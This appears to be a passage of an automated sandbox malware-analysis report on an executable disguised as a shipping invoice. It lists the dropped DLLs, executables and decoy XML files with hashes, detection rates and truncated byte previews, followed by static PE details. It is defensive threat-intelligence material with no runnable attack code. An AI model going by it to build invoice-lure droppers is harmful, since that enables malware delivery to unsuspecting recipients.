                                                                                                                                  Preview: ..`z....6.<.~......1.n...3`.i{W$sN.B.N.(D.t..9Yj..\u.d'..nM.............&..9N...hu.T..nC.......U....i.p..P..0...~zY...C.....SR@...~.].......{N.t...X...].L.Pw..^Q.}......>......+...'..(.Ct.....,..W.....=...p...-...nJ....3...*..=.....p....^...6....y+|..?...J........|g.Rc.(....d...1...{y6C..}P.>./....M.s.>/...........M.%9.?...D...G.;.$.4[...\."... .= ...6.i.%...d.y.D.'...L....'...[).Z..T...<.d$.....`.rS#.@.1.G&...O|.*E..=......g...)...>|.z.B...t....]......,.......B./.....!._..0].......&.....5.....}Y.K.;J...........3..L.....'/.L.6.....6..1..qM...;]..1Y.3t.a...wvI.K....]5..Q...,...]..TU.$VCC..W.]....,>........B~k.Q.b..{.XBu..~cy|s...#N......s.{.....+...8d.U.......CD....W..DL...`%L..t.,.VG........K.....PS[.!...?.....X....~p.2+..o...|MR.wd.....HLd".c...;..B.X.o..d.S..Z.w..w....+.........Km.H..%.f..vT`.{.....+..:....l(.0..V|..E.......(..cN.......mLI9#@n....Z./.7..c........?z+.........`,...aR}..N.........|..r......4.,......zU.d.|..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Prehnite.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):73728
                                                                                                                                  Entropy (8bit):5.318897902733705
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TXpmIFZK536QZVz2LHG/jgVUTTkSTC+OWsGMN8ZoVVtAb1zcGtIrdCR:T5nc3hVz26rJNC+OWsGtMtAZzcGtIp0
                                                                                                                                  MD5:F8AA685A3908110E79F4639AA7DADDFA
                                                                                                                                  SHA1:DD4D16172EA4851F757ABD34A8CB3C835552E6A3
                                                                                                                                  SHA-256:AEEA4B86EA607CF9820E3CADD4E98353A57EC789EC0A0E2FEFBDD84ABD25194A
                                                                                                                                  SHA-512:8989A1E5A29043A8CEC9353D8923DC7FCA52988949637133D5AF5F655B04C8016EF8930DA4F57A9C068B8E9208C4B8AE2BDACA9CA699755D139CAB0ED2A3C5A6
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R..{<..{<..{<...A..{<...Q.{<..ta..{<..{=.{<...R..{<...F..{<...D..{<.Rich.{<.................PE..L...D.._...........!.................1....................................... ......................................................................................................................(...@...............\............................text............................... ..`.rdata........... ..................@..@.data....<.......@..................@....reloc..b........ ..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.640913891016309
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:fqKIjHhW0CfW0FKT7vZKP1xG69D1/gEehcaLnTJ/2acSd:3RnfW0eoPPXpCnTJ/2acSd
                                                                                                                                  MD5:ED1C00557CDE869CAA963BBF9C820F05
                                                                                                                                  SHA1:53BBD8B86FCBEE9316E02AF399634522B12539B0
                                                                                                                                  SHA-256:4D50CE341BE70511E9A871DD347B3F5793EA97787CDFC92045C0BCC8AAE6E298
                                                                                                                                  SHA-512:509AFC51B647A6904A3A4ABF04B43DFAEE5FA0878C3A822FCE84DD58CE2AB1C15A38610487C520CA6F7C42ED37D754DF55A82B0A81A28D31493F2535D9568405
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K4T.*Z..*Z..*Z.'"U..*Z.'"...*Z..*[.}*Z.*"...*Z.*":..*Z.'"...*Z.'"...*Z.Rich.*Z.................PE..L...F..>.................`...F......aU.......p................................................... ..........................`c...........6..............................................................@............................................text...F^.......`.................. ..`.data........p.......d..............@....rsrc....6.......6...f..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-navi-animation.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3225
                                                                                                                                  Entropy (8bit):5.314169702825883
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:1H5/nf2jK/PMQ5B15rPYs7xV01oAZXw5BQDs4XJxjvF1w0ng0nnmDkrZeClbrIMH:ffIil2FI0
                                                                                                                                  MD5:9565C08D6037EEA308B97581F12BE260
                                                                                                                                  SHA1:1954B1CFBF437BD79FDD597C15C25BB01B83F243
                                                                                                                                  SHA-256:1199A3E8F3C8C23C59FEB468A1D1542BA6ABE3C373589DF0277924EAFDB50D57
                                                                                                                                  SHA-512:247762DF5C903AC0F478831A88FB4E0FE3EDF5404FE3D263A443BC035D9741317DF8CDA8284A6409C3D7DB8E89742520E9DCAC4F9E0BB38ED18E24C791D6CA0D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-navi-animation">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Windows animated cursor</comment>. <comment xml:lang="ar">.... ...... .......</comment>. <comment xml:lang="be@latin">Animavany kursor Windows</comment>. <comment xml:lang="bg">...... . Windows, ........</comment>. <comment xml:lang="ca">cursor animat de Windows</comment>. <comment xml:lang="cs">animovan. kurzor Windows</comment>. <comment xml:lang="da">Windowsanimeret mark.r</comment>. <comment xml:lang="de">Animierter Windows-Cursor</comment>. <comment xml:lang="el">.......... ....... Windows</comment>. <comment xml:lang="en_GB">Windows animated cursor</comment>. <comment xml:lang="es">cursor animado de Windows</comment>. <comment xml:lang="eu">Windows-eko kurtsore animatua</comment>. <comment xm
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-pn-audibleaudio.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):392
                                                                                                                                  Entropy (8bit):4.965076682722952
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:TMHd97KLSjTqy3F4N5542UHZ2DKX2IRKCJSHUBmAyJSHUBmA4AsF:2d97/joqZHZ2i2kKCLBmrLBmpjF
                                                                                                                                  MD5:AD1C969082DE8AA77B382516F5B0FF61
                                                                                                                                  SHA1:A83DC30341A5752A9D0D18770EF257C8C0B3A692
                                                                                                                                  SHA-256:78930E0C87BC468FC5B13A5F971C244D9158C9DE7B1F2C219213E5CA18E60F03
                                                                                                                                  SHA-512:559B71307FF0159089FA194B1C0359B446C23A78F3B44D969BA44B759ACA409BFF0B63F7FF5CA7BDA840583F9C29E13527B36DA45CBEAB6189D15BA9037F473B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/x-pn-audibleaudio">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Audible.Com audio</comment>. <glob pattern="*.aa"/>. <glob pattern="*.aax"/>. <alias type="audio/vnd.audible"/>. <alias type="audio/vnd.audible.aax"/>.</mime-type>.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\VCProjectEngine.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1078
                                                                                                                                  Entropy (8bit):5.254976539067803
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:2djEk62f7mmhKslkmog89hEmYnLuZ1nLw3LHEaFXu0:cjP7mmh3amorEmYnLinLw3LHEaFXL
                                                                                                                                  MD5:3E2460DF0763A75406D2C92A6CAC864C
                                                                                                                                  SHA1:3CC0933DF52BD4B09767ADA563B58923EF68EBAF
                                                                                                                                  SHA-256:301A735BCB6DE1DE09D0B9098228A419954404D8AA575F40AD82FC3A84403E35
                                                                                                                                  SHA-512:5B80AEBC3BEC840CE2ED024E1D6551F67E6DC7F611FDE1F054F7A4053AECDE72460517C5203672694E98DBE9F9C97CFEE2CF9A5FB39DCDCB17862051039D3FEA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<VCPlatformConfigurationFile ...Version="8.00"...>.. <Platform ....Name="VCProjectEngine.dll" ....Identifier="Win32"....>....<Directories .....Include="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include".....Library="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)atlmfc\lib\i386;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib;$(VSInstallDir);$(VSInstallDir)lib".....Path="$(VCInstallDir)bin;$(VCInstallDir)PlatformSDK\bin;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;$(ProgramFiles)\HTML Help Workshop;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);$(VSInstallDir);$(VSInstallDir)\SDK\v2.0\bin;$(SystemRoot)\SysWow64;$(FxCopDir);$(PATH)".....Reference="$(FrameworkDir)$(FrameworkVersion);$(VCInstallDir)atlmfc\lib".....Source="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\WordExceptList.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3965
                                                                                                                                  Entropy (8bit):4.628651510242669
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:J9EFoF4F+FYwFkkkOzycs608uXPfzW6up8JiJHhwU9gvzu/6v1wtgETtkbvcIEeP:JpCHncA75Jz
                                                                                                                                  MD5:EF0EA2A1ECE97BE3CF9C9F1D30670E34
                                                                                                                                  SHA1:B960BCB826DA726AB2D919EEF781EE586DF4D607
                                                                                                                                  SHA-256:BA85D3915E513AF98861E7AD82A42E80D957CE52A71463E6E34609C34F3A0E1C
                                                                                                                                  SHA-512:CA23AD61BAEF5E5E96331D7DB2D645D657FB692E4641D364D94F703CDEDDE7C2FCCBBB5939DFA2B43CE07E767F51F6EF72FE1ACE58A6CA47D4DDCCD7B6799443
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <block-list:block-list xmlns:block-list="http://openoffice.org/2001/block-list"><block-list:block block-list:abbreviated-name="BCom"/><block-list:block block-list:abbreviated-name="BCom(Ed)"/><block-list:block block-list:abbreviated-name="BComHons"/><block-list:block block-list:abbreviated-name="BCom(Hons)"/><block-list:block block-list:abbreviated-name="BCompt"/><block-list:block block-list:abbreviated-name="BCur"/><block-list:block block-list:abbreviated-name="BCur(Ed et Adm)"/><block-list:block block-list:abbreviated-name="BCur(I et A)"/><block-list:block block-list:abbreviated-name="BDiac"/><block-list:block block-list:abbreviated-name="BEcon"/><block-list:block block-list:abbreviated-name="BEcon(Ed)"/><block-list:block block-list:abbreviated-name="BEconSc"/><block-list:block block-list:abbreviated-name="BEd"/><block-list:block block-list:abbreviated-name="BEdPh"/><block-list:block block-list:abbreviated-name="BHuish"/><block-list:block block-list:abbreviated-name="BIng"/><block-li
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):18552
                                                                                                                                  Entropy (8bit):6.326879340022009
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:1vh8+o5DhIpvK2HSlajv9J1L/gLCcY9jBJJx+:1JuQ5DgL38TJx+
                                                                                                                                  MD5:0C74A8A66DB361A91A8E46E256234B9D
                                                                                                                                  SHA1:B4EEB6CC71C68264B348824997930426DE1E6C41
                                                                                                                                  SHA-256:245BC780CA69A4B6019625BD1046D7C1C0F4720B795BA2D091AC62B9B7C73DE1
                                                                                                                                  SHA-512:CFBCA14304D8A168944381A139D0299516188C2914F78267CB75C9DB903CB1562BB48E6B540C39C3A9D436180D54B18772C0337C9711808829C20F837C5FEAC9
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................O.....O.....O.....A............O.....O.....O.....O.....Rich............................PE..L......B...........!.........................0.....a.........................p..................................... <..}....7..<....P...............2..x....`..t....0...............................6..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (Windows CE) ARM, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2560
                                                                                                                                  Entropy (8bit):2.8091845512006928
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:6gclPCaIZWy+cAcMphg2R5WPWghhrSZP3CE3h:l+EWAAcwCgWPVhrSh3CEx
                                                                                                                                  MD5:BC977F27DB75D9E99EF4733F6603AD0C
                                                                                                                                  SHA1:799BAF9192BDE18BF0B260840FFE5ADA27CD13A3
                                                                                                                                  SHA-256:BEC1776C798A4DCED9C153A9739FADAAC1D80AF11FB652275A6038396C960CA6
                                                                                                                                  SHA-512:748AC90A592760BA02247A4C31786D5BB65414E1465A2EE81B3D658A856CCA94C07EC89F3A24DBEF3208258ED7F6F0DB990126EA6BBE8654D1A87C97D494BE07
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........................PE......3.3C...........!......................................................... .......................................................................................................................................................................rsrc...............................@..@.................................................... .......8...................?...P.......................h...................................................,.................................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................*.'.....*.'.?.................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.4.0.9.0.4.B.0...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...l."...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....V.S.D. .e.m.b.e.d.d.e.d. .j.i.t. .d.e.b.u.g.g.e.r. .S.t.r.i.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse53A7.tmp
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):657776
                                                                                                                                  Entropy (8bit):6.748405173068804
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:sGgbmgcb04MKJuQxUSw4YNXdJvE/qwakLvDupEScr2d0:TlgcxrJuQ/TCtAqbpHc6d0
                                                                                                                                  MD5:393215B51E4C54A6950B13796ABEA20F
                                                                                                                                  SHA1:77225F7A62F29560C7087176E187ED2012E0A25E
                                                                                                                                  SHA-256:DA2F2572CCA884673B95FF9DD3C8BDF4598240F45F5206F110DF99EC6289EECA
                                                                                                                                  SHA-512:C48A8C603B18790E83A19BAAFA7B5C1443C48163AA84D0CDCD3142F48C84DF971C0EAC8DA6B28F724B167C06E3B439E87A8DD116032701975CB691BF140CE96F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: .i......,.......,........#......X]......uh.......i......................................................*.......................................................................................................................................................................................................j.......................3...............................................................................................................*...............3...............................................................3.......................................g...............................................................j...............................................................................................................................f.......................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):16896
                                                                                                                                  Entropy (8bit):3.838968174263835
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:7YndHVTZZip3YBq2nieYqHAAUsJ3M3IDLbKDnbNWcuTWN:EdHVnG38DieFHcsJcYDL2DnpWbTW
                                                                                                                                  MD5:585AC8F0CA13C1326C5E562B509B8E2D
                                                                                                                                  SHA1:B884490E95CEBA559E50E48F22E810D9E5925792
                                                                                                                                  SHA-256:5551259AE036773BB93168503FE1BA75EA2E5718C02172FDCAE6E20B4B80CA25
                                                                                                                                  SHA-512:88E734E475D3A6A721E18B9FB1E80231CA81509C6B20B9927DDE5A1F16D69FE118C56A1EDC655E492D6388037AE748E39D9A3FE8E4F957BC83703F18A2E5E237
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....3C...........!.........>....................F[.........................p.......I............................................... ..$9...................`.......................................................................................text...p...........................@..@.rsrc...$9... ...:..................@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\number.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):134
                                                                                                                                  Entropy (8bit):4.544675981202402
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vFWWMNCmVijhGOjaESwJFBngKbWJkZGWGOjaESydZMqgKbWJRqT:TM3VijhGif0KykZGWGiJuTKyET
                                                                                                                                  MD5:A75CA31F7ED72AF18B51615986EDA289
                                                                                                                                  SHA1:59CD60370C065551CC3B3EFEF5901B76DE930771
                                                                                                                                  SHA-256:4C2CE6779620133C87EC716FA06DA2A3A9EA97862AC0B7AC1051B474573EE93E
                                                                                                                                  SHA-512:3BE3A461AFE5B0527719A1F1103BD0CB836C8F4340DB5192C99BF0121C9F3D3F9ECB0127E6C82F1FF830E297AF54199706671053CC6BE4CC91C29F6180C96010
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version='1.0'?>..<data>...<circle>....<radius>12</radius>...</circle>...<circle>....<radius>37.5</radius>...</circle>..</data>
                                                                                                                                  C:\Users\user\AppData\Roaming\panel\box\xbox\67.opends60.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):47
                                                                                                                                  Entropy (8bit):3.9953502875256306
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:p/uBallM/lErm1F:RcasDP
                                                                                                                                  MD5:E4E4F671BDE80749EA2EB465FDA2568D
                                                                                                                                  SHA1:5CA98566B46E8BC5538399CB05F85A8F41DDE61F
                                                                                                                                  SHA-256:82F834504F7C6FCE706E28083E8A93F52A61A84918B0CDCBDC0B1A70B505B1D1
                                                                                                                                  SHA-512:61E8CED4EE21CED48F0D4FBCCE3CCC35546DBAFB6B6C63A73503205740830BA11452E44A668AEE123F72A1C75499B5F9A270E85B56BF782EA79A4D695EEDAA08
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ......L....9....)..._srv_senddone.opends60.dll.
                                                                                                                                  C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6144
                                                                                                                                  Entropy (8bit):4.623117599850433
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:K1DJcZB62DHzW6st3+K9XEWCPCNjaqNyyWPV:K1dIH1sD6WCKNjaMyyWN
                                                                                                                                  MD5:743B7D073C1BFB883B9F97CA1D5DDF94
                                                                                                                                  SHA1:01AFEC884E6B5D1CA5ECCB47E18C52CFF44882FA
                                                                                                                                  SHA-256:1A0E9EC2FD53F7D0CE83BF4745D44681412724250046F0A88C54A630EE5A9A59
                                                                                                                                  SHA-512:5947FC4DC66F476289EECA57E7D2CB0766528602DA8C124C62A544ACC4DDD38944B15ECFE9651A74764379797A5B782975DC7949EC37A3C6E6757E5477502979
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:..L:..L:...B..L:.Rich.L:.........PE..L...P.3C...........!.........................................................@.......b.......................................................................0.......................................................................................rsrc...............................@..@.reloc.......0......................@..B................H...(.......@.......h...................................................X...................................................................................................................................(.......................8...`...V...............h........... ...(...........H...*...........x.................C.T.M.E.N.U...........CFCT............r...T........,?.2...cvw.y............................h..y..w........wxw.w.y..ww.........................................
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5120
                                                                                                                                  Entropy (8bit):3.152590437417521
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:KqiJ6OqhgmLwQpXMbqwcI65y7+OiaC+IZWo6zqhpm3F5WPWghnpgX:jOqhiZF6zSEWEOjWPVn0
                                                                                                                                  MD5:CC869C04E8771D08397DC86374FE5A5E
                                                                                                                                  SHA1:D7CD17B9607538DCDD6FC267EE504B37740992FF
                                                                                                                                  SHA-256:420007C3E0A76AC880679F323653D3B9321832F578CA4DC1C2A1E5775A0F77DD
                                                                                                                                  SHA-512:684114317AB54248D20727058F58E592CFFEE865E876B8155C4426EE71CF15BFACAEE07E2C9EF49C8D3F99CF6F0E20AE8800D2DF88F0550E5304AB39BA468EF4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L...K.3C...........!...............................[.........................@......G................................................ .......................0.......................................................................................text...q...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46784
                                                                                                                                  Entropy (8bit):6.38572528005874
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:iiLuedE09FC5Ja5gR/2hyzsiPKxUd+0PpOmMKbfZD8L3d/o+/j:iiLu+LsjPR/2AzsiP3+KOmdbfZD8R/ou
                                                                                                                                  MD5:2483FFB732EFA8A92F6A78B4E97C07EA
                                                                                                                                  SHA1:4929D6076B400EB8C92D941E7C2898FEF282094D
                                                                                                                                  SHA-256:8713626CFB6493E4905448C96BEA3F77C0A05876208B3F87BF95D13166D53A70
                                                                                                                                  SHA-512:F71E5DBB2F985DCD7A0CB1C14D602A05964F15D6E32A859FA48710EB34AF9540448A86E27AD0E0BF3136465C6C142BCC473F74C215B248F07E8C641AF168FDE2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q.y...*...*...*...*...*...*...*...*...*...*...*G..*...*...*...*...*...*...*...*...*...*...*...*...*...*...*...*Rich...*........PE..L.....3C.................v..."......df............@.............................................. ...........................z......................................@...............................@...@............................................text....u.......v.................. ..`.data...,............z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\x-lz4.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1953
                                                                                                                                  Entropy (8bit):5.19612754901248
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFQHd6hH3nRBS46jdeBOfGguEeB5NCgZ2clMfeBtIQxq3vQjS/LMSkPYF:e13nRBSDheBOfGguEeBPCgZ2clMWBtIP
                                                                                                                                  MD5:D36051864C2DB5D4112463629F26A091
                                                                                                                                  SHA1:24BF1CC82EBBCCFEE903A0F11E45D40D8F93BF0E
                                                                                                                                  SHA-256:E0B10A6875F8FAB58C1E9C58900CB5363DD7ABFC5921C9FBC67D5A12212E7B5F
                                                                                                                                  SHA-512:0F21BEA6ED7EA348E295FD551400F1928407C635077B7457C02B089D0C6B215DE818BFE2D7A5796DB82512EF8F4A91B053A60303A6737FC3872ACE861D8F83C3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-lz4">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>LZ4 archive</comment>. <comment xml:lang="ca">arxiu LZ4</comment>. <comment xml:lang="cs">archiv LZ4</comment>. <comment xml:lang="da">LZ4-arkiv</comment>. <comment xml:lang="de">LZ4-Archiv</comment>. <comment xml:lang="el">........... ...... LZ4</comment>. <comment xml:lang="en_GB">LZ4 archive</comment>. <comment xml:lang="es">archivador LZ4</comment>. <comment xml:lang="eu">LZ4 artxiboa</comment>. <comment xml:lang="fi">LZ4-arkisto</comment>. <comment xml:lang="fr">archive LZ4</comment>. <comment xml:lang="ga">Cartlann LZ4</comment>. <comment xml:lang="gl">Arquivo LZ4</comment>. <comment xml:lang="he">...... LZ4</comment>. <comment xml:lang="hr">LZ4 arhiva</comment>. <comment xml:lang="hu">LZ4 arch.vum</comment>. <comment xml:lang

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.87849220099009
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File size:438107
                                                                                                                                  MD5:579ba39b6a146080ef6481591440e445
                                                                                                                                  SHA1:06bfc3b47e1ad6a35e10cb4a1edee6c563710107
                                                                                                                                  SHA256:d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
                                                                                                                                  SHA512:bc2c920da35971ea6a6dfa8fc4f49829d6ba1eeae9589207b1f77a6e5f66d66dcb87396aadce266a61652f6fdfbe40503b9183af5f5ce26fa6cc9218df1597b9
                                                                                                                                  SSDEEP:12288:GanGnRPRnPSuPSw4YxX/Jva/qw0kLvDBZNC1J:8PhS7T8v+kW2J
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................f...|.......3............@

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:90c8e472b85c261a

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x4033a9
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                  Time Stamp:0x5DF6D4F7 [Mon Dec 16 00:51:03 2019 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
